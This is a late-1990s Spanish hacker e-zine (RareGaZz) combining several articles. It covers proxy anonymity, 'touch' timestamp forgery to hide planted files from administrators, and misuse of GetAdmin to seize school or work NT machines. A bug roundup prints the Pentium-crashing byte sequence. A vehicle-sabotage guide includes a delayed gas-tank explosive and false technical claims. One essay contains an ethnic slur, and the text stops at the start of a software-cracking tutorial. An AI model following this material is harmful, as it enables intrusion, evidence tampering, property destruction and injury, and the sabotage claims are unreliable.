 frankfurt.www-cache.dfn.de
 cache.nic.surfnet.nl
 koeln.www-cache.dfn.de
 proxy.cineca.it
 proxy.imaginet.be
 proxy.rediris.es
 proxy.interpac.be
 proxy.skynet.be
 [ si conocen mas o mejores mandenme mail]

 Prueben todos los que puedan y elijan, les recomiendo visitar la pagina
 web de cada uno para informarse que tipo de proxy es y como manejan los
 logs. Recuerden que sites como hotmail nos rebotan si usamos proxies
 conocidos, prueben con otros y  listo!
 Para comprobar que realmente estan ocultando su procedencia pueden
 hacerlo en la misma pagina de Raregazz, en la parte de mensajes
 anonimos aparece su direccion IP, prueben con y sin proxy. Para FTP
 conectence con algun servidor que les diga "Hola [tu IP]  te estamos
 vigilando"  :) que vigilen...

   "Desde que uso proxies soy mas feliz"
                                     ---|---

 =VoraX= vrx@bigfoot.com  {llave PGP a pedido}--= 30/12/97
==============================================================================




Comando TOUCH - cambiar hora y fecha de un archivo

Este es un comando muy util en todos los hack's. Podemos cambiar
la fecha y hora de acceso/modificacion de un archivo al que tengamos
permiso de escritura ( o r00t ;) ). Esto sirve para confundir al admin
si detecta nuestros archivos, para engaar a algunos programas de chequeo,
para que si insertamos algo en /bin no desentone con los demas comandos
y muchos usos mas.
sintaxis:

touch  [-acfm]   [-r   reference-file]  [-t  MMDDhhmm[[CC]YY][.ss]] [-d  time]
[-time={atime,access,use,mtime,modify}] [--date=time] [--file=reference-file]

Primero especificamos:
-a = Solo cambia la f/h del ultimo acceso al archivo.
-m = Solo cambia la f/h de cuando se modifico el archivo.

-t MMDDhhmm[[CC]YY][.ss] = especifica los 'datos temporales'
MM= mes DD=dia hh=hora mm = minutos OPCIONALES: CC=siglo YY=ao .ss=segundos

-r archivo_de_referencia =Usa los 'datos temporales' del archivo_de_referencia

(esto es lo basico, hay mas)
ejemplos:

unix:~$ls -l
-rw-------   1 vorax    users        3773 Nov 15 10:08 mbox
-rw-r--r--   1 vorax    users        3717 Dec 16 21:34 pedo

unix:~$ls -lec
-rw-------   1 vorax     users        3773 Sat Dec 13 20:21:36 1997 mbox
-rw-r--r--   1 vorax     users        3717 Mon Dec 16 21:34:10 1997 pedo

(si queremos dejar igual pedo a mbox):
unix:~$touch -r mbox pedo          (toma mbox como referencia)
unix:~$ls -l
-rw-------   1 vorax    users        3773 Nov 15 10:08 mbox
-rw-r--r--   1 vorax    users        3717 Nov 15 10:08 pedo

unix:~$ls -lec
-rw-------   1 vorax    users        3773 Sat Dec 13 20:21:36 1997 mbox
-rw-r--r--   1 vorax    users        3717 Mon Dec 16 21:34:10 1997 pedo

F/H especifica: (12/05 20:30 hs) (ao actual)

unix:~$ touch -t05122030 prueba
unix:~$ ls -le prueba
-rw-r--r--   1 vorax    users           5 Mon May 12 20:30:00 1997 prueba

12/05/1995 20:30hs:

unix:~$ touch -t051220301995 prueba
unix:~$ ls -le prueba
-rw-r--r--   1 vorax    users           5 Fri May 12 20:30:00 1995 prueba

Sin parametros pone el tiempo actual:
unix:~$ date
Tue Dec 16 00:47:22 EDT 1997
unix:~$ touch prueba
unix:~$ ls -le prueba
-rw-r--r--   1 vorax    users           5 Tue Dec 16 00:47:07 1997 prueba
===========================================================================
=VoraX= 12/97 - vrx@bigfoot.com




ͻ
                                      +++ Azum Lord +++                   
       LAS                                                                
 POSIBILIDADES EN             http://www.xoom.com/logos/wlm.htm           
    WINDOWS NT                       AzumLord@bigfoot.com                 
  -primera parte-                                                         
ͼ
                           ͻ
                              CONTENIDOS   
                           ͼ

          1.>> Disclaimer    <<
          2.>> Introduccion  <<
          3.>> Posibilidades <<
          4.>> Acciones      <<

 ͻ
  1. DISCLAIMER.-                            
 ͼ

  El contenido de este texto esta solamente destinado a usos educacionales,
  de investigacion  y  de desarrollo. En ningun momento el creador de este
  texto se hace responsable de los daos causados debido a un mal uso de el
  mismo.

 ͻ
  2. INTRODUCCION.-                          
 ͼ

  Este articulo trata sobre algunas de las posibilidades que se pueden
  explotar a Windows NT, y talvez con este articulo se te prenda el foco
  y se ocurran algunas ideas similares o mejores porque como vas a ver
  se pueden hacer muchas cosas con este Sistema Operativo.

 ͻ
  3. POSIBILIDADES.-                         
 ͼ

  1. Alguna vez se te ha ocurrido que seria divertido que mientras el
  profesor de computacion esta dando su clase con el caon, tu sabes ese
  aparatito que se conecta a la computadora y la proyecta en el pizarron
  el profesor te esta explicando por 11a vez los comandos del MSDOS, te
  imaginas que a mitad de esto la computadora se apaga };->.

  2. O que uno de tus enemigos va a dar una conferencia estan las
  personalidades mas importantes y el tan seguro de su conferencia que cree
  que todo le va a salir perfecto y a media conferencia llega un mensaje
  rayandosela a todo el publico presente };->, ups eso si que seria
  ridiculizante.

  3. O si alguna vez hiciste un trabajo en una computadora de tu
  escuela/trabajo y por alguna razon lo tuviste que dejar ahi y por alguna
  desconocida razon no vas a estar, pero ese mismo trabajo era un trabajo de
  equipo y para colmo sales de viaje, le hablas a tu compaero de equipo, le
  das la IP de esa computadora, un login y un passwd y desde la comodidad de
  su hogar/trabajo el saca el archivo!!!!!!!

  4. Te gusta el warez y necesitas una computadora que este siempre este
  conectado a internet, tu sabes para intercambiar juegos/programas/o lo
  que sea, entonces agarras una computadora de tu escuela/trabajo y la
  conviertes en un servidor ftp.
 
 ͻ
  4. ACCIONES.-                              
 ͼ

  1. Esto se puede hacer de una forma muy sencilla lo primero que necesitas es
  el GetAdmin ( disponible en la pagina de RareGazZ ) y un programita que se
  llama BootAdmin este programita se puede conseguir en www.bhs.com es
  totalmente GRATIS pero este programa puede apagar solo las computaras donde
  tu seas administrador y esto ultimo es facil de hacer con el getadmin.

  2. Esto se puede hacer con un programita que se llama NT_Hail este programa
  permite enviar mensajes a cualquier computadora conectada a tu dominio
  incluyendo la del servidor. Este programa se puede conseguir en
  www.filez.com

  3. Esto se puede hacer con un telnetd daemon y hay varios como el de Ataman
  que es gratis, con este programa puedes convertir cualquier computadora en
  un servidor puedes configurarlo para el numero de usuarios que desees y 
  muchas otras opciones mas.

  4. Esto se puede lograr con el SERV-U que convierte cualquier computadora
  en un servidor FTP este programa lo puedes encontrar en mi pagina.

 ͻ
  5. CONCLUCION.-                            
 ͼ

  Como puedes ver las posiblidades son muchas solo es cuestion de imaginacion,
  quiero volver a decir que las posibilidades de arriba son solo algunas.




                            MAS BICHOS EN INTERNET
                           ========================

 IP BUG
 Un usuario de internet identificandose como m3lt reporto un BUG que
 inmediatamente congelaria maquinas Windows (3.11/95/NT). Cuando se indago,
 varios sistemas fueron encontrados como afectados aparte de Windows. Este
 error es causado en los sistemas que no detectan un error cuando se recibe
 un SYN spoofed (falso) donde la direccion destino y el puerto destino son
 el mismo que la fuente.

 IRIS Buffer Overflows
 Silicon Graphics aviso de un error de sobrecarga en los buffers en df, eject
 y libXt. El error se extiende hasta con Magic Desktop. Los permisos que
 deben usarse para evitar el error son:

                # /bin/chmod 500 /usr/sbin/syserr
                # /bin/chmod 500 /usr/lib/desktop/permissions
        
        Parches pueden obtenerse en:
        sgigate.sgi.com
        ~ftp/security
        ~ftp/patches.

 TCP Fragment Overlap
 Un error en Linux, Windows NT y Windows 95 que permite que usuarios con
 malas intenciones estrellen el sistema. Cuando se re-ensamblan los
 fragmentos, se hace un test para ver si son muy largos. Pero, no se hacen
 tests para ver si el fragmento es muy pequeo. El resultado es que memcopy()
 es pasado a un numero negativo que causa un crash en la maquina.
 El exploit esta disponible por internet. Una version maliciosa del exploit
 original permite estrellar muchos sistemas al mismo tiempo.

 Microsoft Internet Explorer Ver.4 OverFlow
 Un anuncio sacado a la luz por L0pht Heavy Industries describe una sobrecarga
 del buffer en todos los programas que vienen con la suite IE4 como lo son
 el navegador y Outlook Express. Como no existen restricciones en cualquier
 link que contiene una URL del tipo "res:" permite a usuarios remotos ejecutar
 codigo haciendose pasar por el usuario ejecutando el software.

 Pentium Killer
 El siguiente codigo, cuando es alimentado a un Pentium ocasiona un Crash:
 F0 0F C7 C8

 Cisco Passwords
 Para demonstrar lo simple que es el tipo de encripcion usado por cisco, se
 creo un programa en C y un shell Bourne que fue posteado a las listas de
 seguridad en internet. El tiempo de decripcion es menor a un segundo.

 Inseguridad NT
 Solar Designer ha sacado a la luz un papel documentando todas las formas
 en que se puede hackear, estrellar, crackear, etc. Un sistema NT.

 Root Remoto en BSD
 Secure Networks descubrio un exploit remoto que en algunos daemons de
 telnet BSD permiten obtener shell root.

 Exploit remoto en lpd
 Un agujero fue encontrado en el daemon lpd de BSD que permite la manipulacion
 remota de archivos, asi como tambien la habilidad de ejecutar comandos
 remotos para obtener un shell.

 Microsoft Internet Explorer Agujero de seguridad en Java
 Un problema de seguridad con serias ramificaciones ha sido descubierto.
 Los applets java no pueden (supuestamente) conectarse a otro sitio desde
 el cual son compilados, pero existe una forma de hacer esto.
 El agujero no es de Java, unicamente del navegador de Microsoft.

 Error en WinNT
 Este error permite a cualquier usuario estrellar el sistema u obtener
 privilegios de administrador.

 Peligro con Windows 95
 Si surfeas la red usando el explorer de Microsoft desde una red NT corre
 peligro tu password (windows 95 no los encripta) si un atacante se mete
 al servidor NT.

 NTSecurity saca Red Button
 http://www.ntsecurity.com/RedButton/Red Button
 Red Button es una herramienta que te permite conectarte a cualquier maquina
 NT disponible, ver partes del registro, etc. Una utilidad que protege
 parcialmente es: http://ntbugtraq.rc.on.ca/david.htmfree

 L0pht saca L0phtCrack
 http://www.l0pht.com/advisories.htmlL0phtCrack
 L0phtCrack es una herramienta que te permite recuperar passwords NT usando
 diferentes metodos.

  estamos seguros ?




                      RELIGION Y OTRAS COSAS INSERVIBLES
                  Recopilacion por el hereje mayor: RareTrip

                            1. Que diablos es esto???
                            2. Creo en dios?
                            3. Crees en dios?
                            4. Juan Diego al estrellato

 Parte Uno. Que diablos es esto???
 Por: RareTrip

 RareGaZz desde sus principios se obligo a brindar temas de polemica en sus
 bytes por eso este texto ha sido recopilado para su publicacion. Sentiremos
 mucha pena si perdemos lectores por este texto pero deben permitirnos la
 libre expresion y libertad de creencias asi como nosotros se las permitimos
 a ustedes. NADIE aqui dice que lo que crees es mentira! Nada mas te invitamos
 a razonar un poco sobre lo que haces y lo que das por verdadero. Al finalizar
 puedes olvidar esto... o aplicarlo en tu vida. Tu decides.

 Parte Dos. Crees en dios?
 Por: Goethe

  QUIEN osaria decir: "Creo en dios" ?
 Puedes preguntar a sabios y sacerdotes, y su respuesta no parecera sino una
 burla dirigida al preguntador.
  QUIEN puede confesar: "Creo en el" ?
  QUIEN siendo capaz de sentir, puede atreverse a exclamar: "No creo en el" ?
 Aquel que todo lo abarca, aquel que todo lo sostiene, No abarca, no te
 sostiene a ti, a mi, a el mismo? No se extiende el cielo formando boveda
 alla en lo alto? No esta la tierra firme bajo nuestros pies? No se elevan
 las eternas estrellas mirando con amor? No te contemplo yo clavando mis ojos
 en los tuyos? Y todo cuanto existe No impresiona tu cabeza y tu corazon
 y se agita visible e invisible cerca de ti en un eterno misterio? Por grande
 que sea, llena de esto tu corazon, y cuando, penetrada de tal sentimiento,
 seas feliz, nombralo entonces como quieras, LLAMALE FELICIDAD, CORAZON, AMOR,
 DIOS. Para ellos no tengo nombre; el sentimiento es todo. El nombre no es
 mas que ruido y humo que ofusca la lumbre del cielo.

 Parte Tres. Crees en dios?
 Por: Osho

 Yo no creo en creencias. Eso tiene que ser entendido primero. Nadie me
 pregunta crees en el sol? crees en la luna? Nadie me pregunta: crees en
 la rosa? No hay necesidad, la puedes ver. La rosa existe o no existe. Solo
 se cree en ficciones, no en hechos. Dios es la mas grande ficcion que el
 hombre ha creado.
  Dejenme explicarles por que la gente ha creido en Dios.
  Una de las cosas mas significativas que hay que entender sobre la mente
 del hombre, es que la mente siempre anda buscando y preguntando sobre el
 significado de la vida, si la vida tiene algun sentido. Asi pues, el hombre
 ha venido buscando si la vida tiene algun sentido, y creo a Dios como una
 ficcion tratando de que asi la vida tuviera sentido, significado.
  Sin Dios, el mundo se vuelve accidental. Deja de ser una creacion de un
 Dios sabio que lo creo para tu desarrollo, tu crecimiento o para alguna cosa.
 Sin Dios, el mundo es accidental, sin sentido. Por lo mismo, el hombre crea
 todo tipo de ficciones -Dios, el Nirvana, los Cielos, el Paraiso, la Otra
 Vida despues de la muerte y hace todo un sistema religioso. Pero todo es una
 ficcion tratando de satisfacer ciertas necesidades psicologicas.
   Yo no puedo decir "Dios existe". Tampoco puedo decir "Dios no existe". Para
 mi no tiene sentido, es un fenomeno ficticio. Cual es el significado de
 una rosa o de una nube flotando en el cielo? No hay ningun significado y sin
 embargo tienen una tremenda belleza. No tienen sentido. Un rio sigue fluyendo
 y lleva tanta alegria. No se necesita que tenga ningun sentido! Como es,
 es suficiente.
   No creas ficciones. Una vez que creas una ficcion, tienes que crear mil y
 una ficciones para sostenerla fuera de la realidad.
   Por ejemplo: hay religiones que creen en Dios y hay religiones que NO creen
 en Dios. De modo que Dios no es una necesidad para las religiones. El Budismo
 no cree en Dios. El Jainismo no cree en Dios. Solamente hay tres religiones,
 las tres enraizadas en el Judaismo, que manejan la creencia en Dios:
 Cristianismo, Judaismo e Islamismo. Buda nunca creyo en Dios, no tenia
 necesidad de hacerlo. Tampoco Mahavira, y sin embargo sus vidas fueron tan
 divinas como puede ser la vida.
   No existe Dios sentado en los Cielos y creando el mundo O piensas que
 Dios crearia un desorden como esto que llamas mundo? Si alguien ha creado
 este mundo debe haber sido el Diablo, no puede haber sido Dios. Sin embargo,
 viejas ficciones, repetidas millones de veces, empiezan a tener su propia
 realidad. Y que clase de ficciones bobas pueden volverse "realidad" una vez
 que empiezas creyendo en ellas! Y solo por que lo dice la Biblia... Ya sabes
 la historia de Galileo. Cuando Galileo encontro que NO es el sol el que gira
 alrededor de la tierra, sino al revez, el Papa "infalible" le dijo "tienes
 que cambiarlo, porque la Biblia dice que el sol gira alrededor de la tierra.
 Y la Biblia no puede equivocarse porque ha sido escrita por Dios." Galileo
 era un hombre de un humor extraordinario y penso: "Para que discutir con
 estos idiotas?" Son los mismo que dicen todavia: "Todas las cosas son
 posibles para Dios". Una ficcion que tienen que sostener con otra y otra y
 otra ficcion. Y llegar al punto del absurdo. Eso es la Biblia: un absurdo
 completo.

 Parte Cuatro. Juan Diego al estrellato
 Por: RareTrip

 Mexicanos creidotes de la iglesia... les han mentido! Recuerdan Juan Diego?
 Aquel Indio que vio a la virgen en el cerro ese? Pues ahora resulta, que
 como la iglesia catolica mexicana quiere hacer Santo a ese personaje (o
 deberia decir leyenda?) han cambiado todo su linaje. Agarrense.
 Ahora resulta que Juan Diego era Nieto de un emperador mexica o algo asi.
 El caso es que era filosofo, pensador y poseia castillos con mas de 30
 mujeres. Adios al mito del indio. Pero eso si, ahora ya casi es santo.

     como creyeron que iban a hacer santo a un pinche indio mexicano?




                            BUSCADORES EN INTERNET


  En este articulo se pretende tratar algo que no es nuevo dentro de Internet,
ni tampoco para muchos de vosotros, amables lectores, y es la necesidad
constante de buscar y encontrar informacion, ficheros, personas y links dentro
de la vasta red INTERNET.
 
  Cuantos no hemos usado un buscador?.

  Cuantos no nos hemos visto perdidos, viendo como nuestra direccion
favorita cambia de lugar y no la encontramos?.

  Quien no ha visitado una pagina Warez o de Craks y se ha encontrado
que el archivo no se puede bajar por estar en una direccion anticuada o el
sitio esta bloqueado?.
  
  Quien no ha visitado la pagina de algun buscador hacker, situado en
alguna pagina de nuestros amigos, para obtener informacion a lo buscado?.

  De un tiempo a esta parte se ha afianzado en la red los buscadores o
motores de busqueda y no son servicios de modo texto estilo Archie, como se
utilizaban antes, sino que estan programados para poder ser vistos por
nuestros navegadores habituales.

  Basicamente la funcion, mas que la de ofrecer mera informacion, es la de
hacer de nexo entre los proveedores de todo tipo de datos y sus consumidores.

  No hace muchos aos los buscadores estaban menos evolucionados y se
encargaban de encontrar un fichero, un punto en la red y tenian que ser
desarrollados por personas "con mucha fe" porque no ganaban ni un duro, no
siendo como ahora, que los mantienen y desarrollan con dinero y la
publicidad que se hacen las empresas que lo montan y las cotizaciones en
bolsa, como el caso de YAHOO, etc...

  Estas imagenes que te tienes que bajar,la publicidad, es el precio, tu
tiempo, que tienes que pagar por usar un servicio gratuito, y aumentando con
ello el tiempo, para obtener aquello que se busca y tu tarifa de Timofonica
engorda, claro.

  Segun la dificultad que se precise para encontrar una cierta informacion,
se usara un BUSCADOR o un MULTIBUSCADOR (muchos de ellos).

  El buscador tratara de encontrar la informacion solicitada por el usuario en
su propia base de datos y si no son capaces de encontrarla, te presentan otros
buscadores en los que puedas volver a intentarlo o bien el buscador indaga en
alguna base de datos "amiga".

  El multibuscador no suele tener base de datos propia, sino que chupa info
valiendose de los demas buscadores, indagando "a destajo" en los mismos y
diciendote lo que han encontrado.

  Ningun buscador es mejor que otro, solo variara la situacion en la que
nosotros nos encontremos para usar uno u otro. Si la informacion es facil de
encontrar, los buscadores dan muy buenos resultados ofreciendote suficiente
informacion sin saturarte con cientos de links. Si la informacion es dificil
de encontrar es mejor utilizar un multibuscador por ser varios buscadores a la
vez los que te hacen el trabajo y si daran respuesta a tus necesidades de
info.

  Lo que debemos de hacer es utilizar un buscador, y si no nos da la
informacion satisfactoriamente, utilizar un multibuscador.

  Ahora, tienes que tener mucho ojo para darte cuenta, de que tipo de
informacion es la que te combiene obtener y que buscador vas a utilizar, por
que todas las bases de datos de los mismos no son iguales,ni todos los
buscadores son lo mismo, ya que unos estaran mas especializados que otros y
ofreceran mejores resultados para una determinada busqueda. Te puede ayudar a
determinar que buscador escoger el hecho de determinar el lugar que puede
albergar la informacion requerida: el pais propio, una empresa internacional,
nacional o regional, los grupos de noticias y sitios FTP.

  Si buscas una noticia o informacion nacional o local lo mejor es usar un
buscador con base de datos nacional como Ozu, Ole y Sol, para Espaa o Sbel
y Mex-Web para Mexico.

  Si la informacion es internacional, lo mejor es usar un buscador nativo de
ese pais o uno internacional o uno con la funcion especial de buscar
unicamente dentro de servidores con la extension de un pais determinado como
lo hace Hot-Bot (la mejor maquina de busqueda segun PcMagazine e Internet Lab)

  Hay otros buscadores con motores especiales usados para buscar personas y
los buscadores de ficheros. Como metacrawler y Whowhere.

  No hay que desdear los listines telefonicos y paginas amarillas de Internet
que potenciaran nuestras posibilidades de encontrar mayor informacion.

  Si a pesar de todo lo dicho no consigues encontrar lo que buscas, entonces
usa el buscador de ficheros ARCHIE de toda la vida. Es bastante eficaz o
utiliza los buscadores HACKER que te puedes encontrar en la web de los
aficionados al undergrownd.Como:

       http://altavista.box.sk
       http://www.box.sk/neworder
       http://Mp3.box.sk

  Tambien se puede utilizar una base de datos muy buena en
http://www.filez.com pero, sin lugar a dudas, el mas internacional es:
http://altavista.digital.com (creo que es completisimo).


  COMO MEJORAR LA BUSQUEDA EN ALTAVISTA?

  Usando:

       a) (" "): El texto encerrado entre comillas, se buscara tal y como
                 figura entre las comillas.
         
       b) (+): Obliga a que la palabra introducida a continuacion figure en
               los documentos encontrados.

       c) (-): Obliga a que la palabra introducida a continuacion no aparezca
               en los documentos encontrados.

       d) (*): Actua de caracter comodin.


  Ejemplo:
  ========

      1)   "escuela de montaa" +  Barcelona  -  Madrid
                                SI            NO
       Este ejemplo buscara todas las paginas que digan escuela de montaa
       y Barcelona pero no Madrid.

      2) "museos" + chiapas  - mad*        - bar*
                           No palabras   No palabras


  COMO TRABAJAR CON LOS BUSCADORES?

  Normalmente incorporan un campo en el que debe de incluirse la o las
palabras a buscar, como en el ejemplo anterior, que utiliza operadores
booleanos, pudiendose solicitar que se muestre la informacion que contenga una
u otra palabra, las dos juntas, o una de ellas, pero sin que aparezca la otra.
Muchos de los buscadores permiten seleccionar el lugar donde se quiere buscar
como CHIAPAS, BARCELONA o MADRID vistos arriva, (regiones o pais donde se
encuentra el recurso que se precisa y nos ahorra tiempo porque el buscador
tardara menos en ofrecer la informacion y el usuario tardara menos en filtrar
todos los links que le son ofrecidos, ya que se ajustan a sus necesidades y
hay menos que mirar.Tambien nos mostrara el nodo mas cercano a nuestra
conexion, aunque esto no siempre aumentara nuestra rapidez), las News, sitios
web, buscadores de personas. Otros estan divididos en secciones o areas como
deportes, cultura, ocio, empresas, etc.

  QUE BUSCADORES CONOCEMOS EN INTERNET?
  
  Pienso que esta es la pregunta de 1.000.000 porque la RED no para de crecer
y crecer mas y mas todos los dias y todos los dias sale algo nuevo. CREA,
CAMBIA DE SITIO, RENUEVA, BORRA Y DEBORA INFO SIN PARAR. Pero pongo algunos
mas usados.

BUSCADORES INTERNACIONALES
==========================
www.altavista.digital.com.....Muy Completo y tambien en Espaol si lo deseas.
www.hotbot.com................Localizacion de paginas por pais, fecha, etc.
www.infoseek.com..............Redireccion por NetScape
www.lycos.com.................Ficheros Gif, JPEG y MPEG.
www.yahoo.com.................Por categorias y temas.
www.excite.com................Busqueda por conceptos.
www.webcrawler.com............Hace un Index de las paginas.
www.magellan.com


BUSCADORES EN ESPAA
====================
www.ozu.es
www.ole.es
www.sol.es
www.glbalcom.es/indice
www.donde.uji.es...............Relacion para web Espaa.
www.encuentrelo.com
http://biwe.cesat.es
www.fantastico.com
trovador.combios.es

BUSCADORES EN MEXICO
====================
http://rtn.net.mx/sbel/
http://mexico.web.com.mx/

BUSCADORES DE PERSONAS
======================
www.whowhere.com
www.spanish.whowhere.com  (el mismo de arriba pero en espaol)
www.listin.com
www.x500.rediris.es:8888/Mc=ES

BUSCADORES DE FICHEROS
======================
www.filez.com
www.ua.es:8080/internet/castellano/archie.html
www.elibrary.com......................Buscar en libros, mapas, etc.
http://ftpsearch.com/searchpage/indexA.html........... Busquedas en FTP's
http://ftpsearch.ntnu.no/............................. Busquedas en FTP's

SITES DE SHAREWARE
===================
www.download.com......................Famoso, buscate los antivirus actuales.
www.shareware.com.....................Base con mas de 160.000 programas.
www.hotfiles.com
www.tucows.com........................Todo Windows y comunicaciones (winsock)
www.coast.net/simtel
www.cdrom.com
sunsite.unc.edu

MULTIBUSCADORES
===============
www.metacrawler.com
www.designlab.ukans.edu/profucion
www.robtex.com/search.thm
www.cyber411.com

LISTA DE SERVIDORES ARCHIE
==========================
http://web.nexor.co.uk/archie.html

  NOTA DEL AUTOR
  ==============

 Quiero mencionar, que por lo que he visto, se tiende a usar y no abusar de
los graficos y fotos, que tanto nos desesperan y relentizan nuestro PC, en las
paginas destinadas al hacking, abundando en su lugar, una buena predisposicion
para la  informacion. Acondicinamiento de los fondos que le dan realce,
visivilidad y mejor lectura de las letras o caracteres de dichos textos, y una
mayor abundancia de informacion.

  UN SALUDO DE C. COLON




 "World Wide Web = El Mercado mas grande del mundo."
                        Por 12r43lOverdrive.
                        Para RaregaZz.

        Cada dia nos acercamos mas al paradigma planteado por Gibson en su
novela "Neuromante", la cual plantea una sociedad basada en una red global
de informacion, que como en la realidad tiene  muchas fallas y no es
lo que en un principio se planteo como la "Supercarretera de Informacion".

        Ahora vemos el gran auge de tecnologias como Java, DHTML, VRML,
ActiveX, Realaudio, entre algunas otras las cuales son aplicadas al Web (en
algunos casos con gran acierto pero en algunos otros con un abuso de estos)
para tener una interaccion con la red mas amigable y natural, aun recuerdo
los viejos dias del Web, con simples y rapidos archivos HTML, navegando con
NCSA Mosaic y obteniendo la informacion mas rapido y sin tantas demoras, esto
con la desventaja de ser poco amigable y por lo general solo usada por gente
relacionada con investigacion, sistemas y educacion. En la actualidad desde
cientificos hasta amas de casa usan el web, con los beneficios y desventajas
que esto conlleva.

        Creo que el web se ha convertido en un supermercado gigantesco, el
cual ha pasado a manos de las grandes corporaciones y grupos con fines
lucrativos, los cuales saturan los servicios de propaganda, esto ha llegado
al punto de ser paranoico ya que en la mayoria de paginas encuentras
propaganda y mas aun, proliferan las cookies a las que considero una invasion
a la privacidad, es insoportable tener que estar cuidandose de ellas.

        Ahora otro tema muy importante es el acceso a la red, muchos
proveedores ofrecen sus servicios teniendo equipos en mal estado y obsoletos
para permitir un acceso rapido al web, aparte de la negligencia del
departamento de soporte tecnico, es totalmente injusto pagar por un servicio
en mal estado y ademas caro.

        Si uno quiere tener una pagina y correo electronico implica un costo
extra, ademas de ser elevado, los proveedores ofrecen muy poco espacio para
estos servicios, aunque existen servicios "gratuitos" como Geocities y Hotmail
para paginas web y correo electronico respectivamente, muy poca gente sabe de
su existencia y es estafada por una pagina de menos de 2MB y una cuenta de
correo de similar capacidad, aparte del cobro del diseo de la pagina y de la
configuracion de la cuenta en su PC.

        Para concluir, el Web se ha convertido en el negocio del siglo, si no
preguntenle a DEC, Apple o Yahoo entre otros muchos, lo que en un principio
fue creado como un medio de compartir informacion se ha transformado en un
medio de lucro y abuso, claro aun se encuentra la suficiente libertad en el
Web para conservar su espiritu pero la pregunta es: Cuanto durara esta
libertad?. 1998    

12r43lOverdrive.

Me despido deseandoles lo mejor.
12r43lOverdrive. "Muerte a la opresion y a los opresores".    




 ---------------------------------------------------------------------
 -----------UNIX SISTEM V Interface Definition (SVID).----------------
 --------------------Por 12r43l Overdrive-----------------------------
 ----------------------arcanos@mail.org-------------------------------

 Pocas veces nosostros al programar alguna cosa nos preocupamos
 por como se va ha comportar nuestro programa en otras maquinas
 debido a esto muchas veces nos llevamos la sorpresa de que una
 aplicacion robusta no corre en alguna maquina con el mismo
 sistema operativo (SO) Aun mas, con la gran variedad de sabores
 de UNIX y por la importancia de este SO para el hacking, es de
 gran utilidad saber como se va a comportar nuestro programa en
 UNIX asi sea AT&T SISTEM V, SUN OS, IRIX, HP-UX, AIX 6000,
 LINUX etc...
 Por eso me he propuesto escribir una serie de articulos que nos
 pueden ayudar a esto.Agradeceria cualquier comentario acerca de
 estos articulos, aqui vamos!.

                        ---INTRODUCCION---


        SVID?

	SVID especifica el ambiente del sistema operativo que permite
crear aplicaciones de software que son independientes de plataformas
de hardware. El SVID se aplica en el rango de computadoras personales a
mainframes. El SVID especifica los componentes del sistema operativo
disponibles para desarrollo de programas, define la funcionalidad de
los componentes pero no la implementacion de estos. El SVID especifica
la interfaz entre el codigo fuente y cada componente del sistema
operativo, asi como el comportamiento a la hora de correr. Lo mas
importante es la definicion de un ambiente comun para la aplicacion de 
software y el usuario final. 

Cualquier aplicacion escrita usando solamente componentes definidos en
el SVID debe ser compatible y portable en cualquier computadora que
soporte  el "System V Interface" (SVI).El codigo fuente puede ser
re-compilado para mover una aplicacion a una nueva computadora que soporte
el SVI, la presencia y el comportamiento de este y sus componentes es
definido por el SVID.

El SVID esta organizado en el Base System Definition y en una serie de
Definicion de Extensiones. El Base System Definition especifica los
componentes que todo sistema operativo basado en el System V debe proveer.
Las Extensiones del Base System son opcionales en los sistemas operativos
basados en el System V pero cuando un componente esta presente y ocupa de
estas extenciones, es recomendable  especificarlo.

El SVID provee a los desarolladores y a usuarios finales de las
caracteristicas y funciones disponibles para cada uno de ellos en cualquier
sistema operativo basado en el System V.

El SVID esta basado en el POSIX 1003.1-1988 Full Use Standard,X3.159-1989
(ANSI C), y en ISO/IEC 9899-1990 (ISO C).

        Quien usa el SVID?

Por lo general lo usan desarrodaroes de aplicaciones para UNIX y busca que
estas sean portables entre sistemas operativos basados en el SYSTEM V
(Hacking? genial! no?).

	1.- Base System.

La funcionalidad del Base System ha sido estructurada para proveer un
ambiente standard de ejecucion para programas escritos en un lenguaje
de alto nivel como C. Esto con la finalidad de que al migrar una 
aplicacion a un SO en otra plataforma solo se aadan las extensiones
del Base System si es que son requeridas.

	2.- Extensiones del Base System.

Estas extenciones han sido construidas para hacer disponible un camino
robusto para incrementar funcionalidades al SO y asi generar aplicaiones
mas complejas. Dependiendo de la complejidad de nuestra aplicacion es
como vamos a requerir estas extensiones.

Por el momento es suficiente recomiendo analizar e investigar mas al respecto
ya que un poco mas de info no hace dao ;-)

Fuente:
SYSTEM V INTERFACE DEFINITION. 
Third edition.
UNIX SYSTEM LABORATORIES.

Z80Z80Z80Z80Z80Z80Z80Z80Z80
Z80.12r43lOverdrive1997.Z80
Z80Z80Z80Z80Z80Z80Z80Z80Z80




                    LA GUIA PARA JODER CUALQUIER AUTOMOVIL
                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MUCHO DAO
~~~~~~~~~~
 o  Toma un frasco de medicina controlada (los botecitos de plastico cafe)
    y llenalo de Drano (destapa-caos). Echalo al tanque de gasolina y
    retirate. El drano liquido se comera el frasco y BOOM!
    Primero intenta con varios frascos y elige el que tarde mas en quemarse

DAO MEDIO
~~~~~~~~~~
  o Agarra una pieza pequea de aluminio y pegalo entre el encendedor y el
    filamento creando una union. Despues, si el carro esta prendido o no, el
    encendedor vaciara la bateria. La bateria del carro morira misteriosamente
    y cuando le pase energia, en dos o tres dias volvera a morir :-)

  o Coloca un poco de mierda de gato fresca y ponla en el techo o cofre del
    carro en un dia soleado y los acidos se comeran el metal!

  o Toma una pelota de ping-pong y ponla en el tanque de gas. Despues, cuando
    maneje unas 5 o 10 millas, la pelota tapara el tanque y el carro se
    detendra como si le faltara gasolina. La victima llenara el tanque y el
    carro funcionara de nuevo... unas 5 millas mas. >;-)

  o Toma unas 12 o 15 pelotitas de esas para evitar la humedad en cajas o
    cajones y ponlas en el tanque de gas. Esto hara que el nivel de octano
    en la gasolina sea altisimo lo que hara que el motor no pueda pararse.

DAO MENOR
~~~~~~~~~~
  o Pon grasa sucia por todo el mofle. Cuando el mofle se caliente empezara
    a levantar humo negro.



                 ______________________                                      
               /                     /_______________________                       
              /   CRACKS - HACKS Y KAOS CON UN HEXEDITOR    /\
             /____________________                         / /
             \___________________/    <<::RareGaZz::>>    / /
                                /________________________/ /
                                \________________________\/


 En este texto les presentamos una manera rapida y sencilla de registrar sus
 programas favoritos. Antes de modificar un archivo con un editor tienes que
 hacer un respaldo no vaya ser que la jodas y bueno, te quedes sin nada :-)
 Un editor hexadecimal (Hedit) viene incluido en RareGaZz #2

 Como crackear 3D Studio release 4 con un Hex-editor:
